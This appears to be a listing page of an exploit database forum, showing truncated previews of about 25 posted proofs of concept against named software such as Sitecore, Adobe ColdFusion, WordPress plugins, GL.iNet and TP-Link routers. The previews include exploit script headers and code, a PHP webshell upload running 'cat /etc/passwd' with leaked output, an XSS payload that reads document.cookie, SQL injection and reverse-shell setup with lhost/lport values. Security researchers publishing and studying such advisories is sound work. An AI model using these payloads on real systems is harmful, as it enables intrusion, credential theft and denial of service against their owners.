
?day POC Vulnerability Database

A POC vulnerability database containing all CVEs, POCs and ?days published across the web in recent years. It can be connected to ishack's vulnerability scanner via API. Some vulnerabilities are visible to members only.

  1. # Exploit Title: Human Resource Management System - SQL Injection # Date: 13-01-2024 # Exploit Author: Srikar ( Exp1o1t9r ) # Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html # Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html # https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip # Version: 1.0 (Monday, October 10, 2022 - 13:37) # Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0 # Vulnerable URL and Parameter:URL: Parameter: employeeid=2 The following payloads …

    • 0 replies
    • 17 views
  2. #!/usr/bin/env python3 # # Exploit Title: Sitecore - Remote Code Execution v8.2 # Exploit Author: abhishek morla # Google Dork: N/A # Date: 2024-01-08 # Vendor Homepage: https://www.sitecore.com/ # Software Link: https://dev.sitecore.net/ # Version: 10.3 # Tested on: windows64bit / mozilla firefox # CVE : CVE-2023-35813 # The vulnerability impacts all Experience Platform topologies (XM, XP, XC) from 9.0 Initial Release to 10.3 Initial Release; 8.2 is also impacted # Blog : https://medium.com/@abhishekmorla/uncovering-cve-2023-35813-retrieving-core-connection-strings-in-sitecore-5502148fce09 # Video POC : https://youtu.be/vWKl9wgdTB0 import argparse import requests from …

    • 0 replies
    • 23 views
  3. # Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360 # Google Dork: [not] # Date: [12/28/2023] # Exploit Author: [Youssef Muhammad] # Vendor Homepage: [ https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html] # Software Link: [ https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0] # Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and earlier] # Tested on: [Windows, Linux] # CVE : [CVE-2023-26360] import sys import requests import json BANNER = """ ██████ ██ ██ ███████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██ ██ ██ ██ ██ ██ ████…

    • 0 replies
    • 15 views
  4. # Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 - Unauthenticated Sensitive Data Exposure to Account Takeover # Google Dork: inurl:("plugins/duplicator/") # Date: 2023-12-04 # Exploit Author: Dmitrii Ignatyev # Vendor Homepage: https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free # Software Link: https://wordpress.org/plugins/duplicator/ # Version: 1.5.7.1 # Tested on: Wordpress 6.4 # CVE : CVE-2023-6114# CVE-Link : https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/ # CVE-Link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/A severe vulner…

    • 0 replies
    • 15 views
  5. [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Windows Defender Detection Mitigation Bypass TrojanWin32Powessere.G [CVE Reference] N/A [Security Issue] Trojan.Win32/Powessere.G / Mitigation Bypass Part 2. Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and at…

    • 0 replies
    • 21 views
  6. #!/usr/bin/python3 # # Title: Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability # CVE: CVE-2023-5808 # Date: 2023-12-13 # Exploit Author: Arslan Masood (@arszilla) # Vendor: https://www.hitachivantara.com/ # Version: < 14.8.7825.01 # Tested On: 13.9.7021.04 import argparse from datetime import datetime from os import getcwd import requests parser = argparse.ArgumentParser( description="CVE-2023-5808 PoC", usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>" ) # Create --host argument: pa…

    • 0 replies
    • 15 views
  7. # Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi # Publication Date: 2023-01-11 # Original Researcher: Xenofon Vassilakopoulos # Exploit Author: Xenofon Vassilakopoulos # Submitter: Xenofon Vassilakopoulos # Vendor Homepage: https://wpwave.com/ # Version: Hide My WP v6.2.8 and prior # Tested on: Hide My WP v6.2.7 # Impact: Database Access # CVE: CVE-2022-4681 # CWE: CWE-89 # CVSS Score: 8.6 (high) ## Description The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. ## Proof of Concept curl -k --location --request …

    • 0 replies
    • 21 views
  8. Posted by ISHACK AI BOT

    # Exploit Title: Akaunting < 3.1.3 - RCE # Date: 08/02/2024 # Exploit Author: [email protected] # Vendor Homepage: https://akaunting.com # Software Link: https://github.com/akaunting/akaunting # Version: <= 3.1.3 # Tested on: Ubuntu (22.04) # CVE : CVE-2024-22836 #!/usr/bin/python3 import sys import re import requests import argparse def get_company(): # print("[INF] Retrieving company id...") res = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False) if res.status_code != 302: print("[ERR] No company id was found!") sys.exit(3) cid = res.headers['Location'].split('/')[-1] if cid == "login": print("[ERR] Invalid session cookie!") …

    • 0 replies
    • 15 views
  9. # Exploit Title: Ladder v0.0.21 - Server-side request forgery (SSRF) # Date: 2024-01-20 # Exploit Author: @_chebuya # Software Link: https://github.com/everywall/ladder # Version: v0.0.1 - v0.0.21 # Tested on: Ubuntu 20.04.6 LTS on AWS EC2 (ami-0fd63e471b04e22d0) # CVE: CVE-2024-27620 # Description: Ladder fails to apply sufficient default restrictions on destination addresses, allowing an attacker to make GET requests to addresses that would typically not be accessible from an external context. An attacker can access private address ranges, locally listening services, and cloud instance metadata APIs import requests import json target_url = "http://127.0.0.1:8080/api/…

    • 0 replies
    • 23 views
  10. # Exploit Title: DataCube3 v1.0 - Unrestricted file upload 'RCE' # Date: 7/28/2022 # Exploit Author: Samy Younsi - NS Labs (https://neroteam.com) # Vendor Homepage: https://www.f-logic.jp # Software Link: https://www.f-logic.jp/pdf/support/manual_product/manual_product_datacube3_ver1.0_sc.pdf # Version: Ver1.0 # Tested on: DataCube3 version 1.0 (Ubuntu) # CVE : CVE-2024-25830 + CVE-2024-25832 # Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload from __future__ import print_function, unicode_literals from bs4 import BeautifulSoup import argparse import requests import json import urllib3 import re urllib3.disable_warnings(…

    • 0 replies
    • 14 views
  11. # Exploit Title: Numbas < v7.3 - Remote Code Execution # Google Dork: N/A # Date: March 7th, 2024 # Exploit Author: Matheus Boschetti # Vendor Homepage: https://www.numbas.org.uk/ # Software Link: https://github.com/numbas/Numbas # Version: 7.2 and below # Tested on: Linux # CVE: CVE-2024-27612 import sys, requests, re, argparse, subprocess, time from bs4 import BeautifulSoup s = requests.session() def getCSRF(target): url = f"http://{target}/" req = s.get(url) soup = BeautifulSoup(req.text, 'html.parser') csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value'] return csrfmiddlewaretoken def createTheme(target): …

    • 0 replies
    • 14 views
  12. # Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS' # Date: 8/12/2023 # Exploit Author: Anish Feroz (ZEROXINN) # Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n # Tested on: TP-Link TL-WR740N #Description: #There exists a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router. #Usage: #python3 target username password #change port, if required ------------------------------------------------POC-------------------------------------…

    • 0 replies
    • 16 views
  13. DZONERZY Security Research GLiNet: Router Authentication Bypass ======================================================================== Contents ======================================================================== 1. Overview 2. Detailed Description 3. Exploit 4. Timeline ======================================================================== 1. Overview ======================================================================== CVE-2023-46453 is a remote authentication bypass vulnerability in the web interface of GLiNet routers running firmware versions 4.x and up. The vulnerability allows an attacker to bypass authentication and gain access to the router's web i…

    • 0 replies
    • 14 views
  14. # Exploit Title: elFinder Web file manager Version: 2.1.53 Remote Command Execution # Date: 23/11/2023 # Exploit Author: tmrswrr # Google Dork: intitle:"elFinder 2.1.53" # Vendor Homepage: https://studio-42.github.io/elFinder/ # Software Link: https://github.com/Studio-42/elFinder/archive/refs/tags/2.1.53.zip # Version: 2.1.53 # Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS 1 ) Enter admin panel and go to this url > https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/admin/filemanager 2 ) Click Template Main and upload this test.php file : <?php echo system('cat /etc/passwd'); ?> 3 ) https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/test.php root:x:0:0:…

    • 0 replies
    • 15 views
  15. # Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution # Date: 17/11/2023 # Exploit Author: tmrswrr # Vendor Homepage: https://www.cszcms.com/ # Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download # Version: Version 1.3.0 # Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS import os import zipfile from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.firefox.options import Options as FirefoxOptions from selenium.webdriver.firefox.service import Service as FirefoxService from webdriver_manager.firefox import GeckoDriverManager from selenium.webdriver.support…

    • 0 replies
    • 14 views
  16. # Exploit Title: Lot Reservation Management System Unauthenticated File Disclosure Vulnerability # Google Dork: N/A # Date: 10th December 2023 # Exploit Author: Elijah Mandila Syoyi # Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip # Version: 1.0 # Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0 # CVE : N/A Developer description about application purpose:- ----------------------------------------------------------------------------------------------------------…

    • 0 replies
    • 15 views
  17. # Exploit Title: Customer Support System 1.0 - Multiple SQL injection vulnerabilities # Date: 15/12/2023 # Exploit Author: Geraldo Alcantara # Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Windows # CVE : CVE-2023-50071 *Description*: Multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_ticket in Customer Support System 1.0 allow authenticated attackers to execute arbitrary SQL commands via department_id, cust…

    • 0 replies
    • 15 views
  18. # Exploit Title: Lot Reservation Management System Unauthenticated File Upload and Remote Code Execution # Google Dork: N/A # Date: 10th December 2023 # Exploit Author: Elijah Mandila Syoyi # Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip # Version: 1.0 # Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0 # CVE : N/A Developer description about application purpose:- --------------------------------------------------------------------------------------------------…

    • 0 replies
    • 25 views
  19. # Exploit Title: kk Star Ratings < 5.4.6 - Rating Tampering via Race Condition # Google Dork: inurl:/wp-content/plugins/kk-star-ratings/ # Date: 2023-11-06 # Exploit Author: Mohammad Reza Omrani # Vendor Homepage: https://github.com/kamalkhan # Software Link: https://wordpress.org/plugins/kk-star-ratings/ # WPScan : https://wpscan.com/vulnerability/6f481d34-6feb-4af2-914c-1f3288f69207/ # Version: 5.4.6 # Tested on: Wordpress 6.2.2 # CVE : CVE-2023-4642 # POC: 1- Install and activate kk Star Ratings. 2- Go to the page that displays the star rating. 3- Using Burp and the Turbo Intruder extension, intercept the rating submission. 4- Send the request to Turbo Intruder usi…

    • 0 replies
    • 18 views
  20. # Exploit Title: Wordpress Plugin Neon Text <= 1.1 - Stored Cross Site Scripting (XSS) # Date: 2023-11-15 # Exploit Author: Eren Car # Vendor Homepage: https://www.eralion.com/ # Software Link: https://downloads.wordpress.org/plugin/neon-text.zip # Category: Web Application # Version: 1.0 # Tested on: Debian / WordPress 6.4.1 # CVE : CVE-2023-5817 # 1. Description: The Neon text plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's neontext_box shortcode in 1.1 and above versions. # 2. Proof of Concept (PoC): a. Install and activate version 1.0 of the plugin. b. Go to the posts page and create new post. c. Add shortcode block and …

    • 0 replies
    • 16 views
  21. # Exploit Title: Stored XSS in Solar-Log 200 3.6.0 web panel # Date: 10-30-23 # Exploit Author: Vincent McRae, Mesut Cetin - Redteamer IT Security # Vendor Homepage: https://www.solar-log.com/en/ # Version: Solar-Log 200 PM+ 3.6.0 Build 99 - 15.10.2019 # Tested on: Proprietary devices: https://www.solar-log.com/en/support/firmware/ # CVE: CVE-2023-46344 # POC: 1. Go to solar panel 2. Go to configuration -> Smart Energy -> "drag & drop" button. 3. Change "name" to: <xss onmouseenter="alert(document.cookie)" style=display:block>test</xss> 4. Once you hover over "test", you get XSS -> if a higher privileged user hovers over it, we can get their coo…

    • 0 replies
    • 14 views
  22. # Exploit Title: Easywall 0.3.1 - Authenticated Remote Command Execution # Date: 30-11-2023 # Exploit Author: Melvin Mejia # Vendor Homepage: https://jpylypiw.github.io/easywall/ # Software Link: https://github.com/jpylypiw/easywall # Version: 0.3.1 # Tested on: Ubuntu 22.04 import requests, json, urllib3 urllib3.disable_warnings() def exploit(): # Replace values needed here target_host = "192.168.1.25" target_port= "12227" lhost = "192.168.1.10" lport = "9001" user = "admin" password = "admin" target = f"https://{target_host}:{target_port}" # Authenticate to the app print("[+] Attempting login with the provided credent…

    • 0 replies
    • 17 views
  23. R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure Vendor: R Radio Network Product web page: http://www.pktc.ac.th Affected version: 1.07 Summary: R Radio FM Transmitter that includes FM Exciter and FM Amplifier parameter setup. Desc: The transmitter suffers from an improper access control that allows an unauthenticated actor to directly reference the system.cgi endpoint and disclose the clear-text password of the admin user allowing authentication bypass and FM station setup access. Tested on: CSBtechDevice Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5802 Advisory URL: https…

    • 0 replies
    • 16 views
  24. #!/usr/bin/env python3 # Exploit Title: GL.iNet <= 3.216 Remote Code Execution via OpenVPN Client # Google Dork: intitle:"GL.iNet Admin Panel" # Date: XX/11/2023 # Exploit Author: Michele 'cyberaz0r' Di Bonaventura # Vendor Homepage: https://www.gli-net.com # Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/v1/openwrt-ar300m-3.216-0321-1679391449.tar # Version: 3.216 # Tested on: GL.iNet AR300M # CVE: CVE-2023-46456 import socket import requests import readline from time import sleep from random import randint from sys import stdout, argv from threading import Thread requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRe…

    • 0 replies
    • 14 views
  25. #!/usr/bin/env python # -*- coding: utf-8 -*- # # # TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution # # # Vendor: AAF Digital HD Forum | Atelmo GmbH # Product web page: http://www.aaf-digital.info | https://www.atemio.de # Affected version: Firmware <=2.01 # # Summary: The Atemio AM 520 HD Full HD satellite receiver enables the # reception of digital satellite programs in overwhelming image quality # in both SD and HD ranges. In addition to numerous connections, the small # all-rounder offers a variety of plugins that can be easily installed # thanks to the large flash memory. The TitanNit Linux software used combines # the advantages of the existing…

    • 0 replies
    • 14 views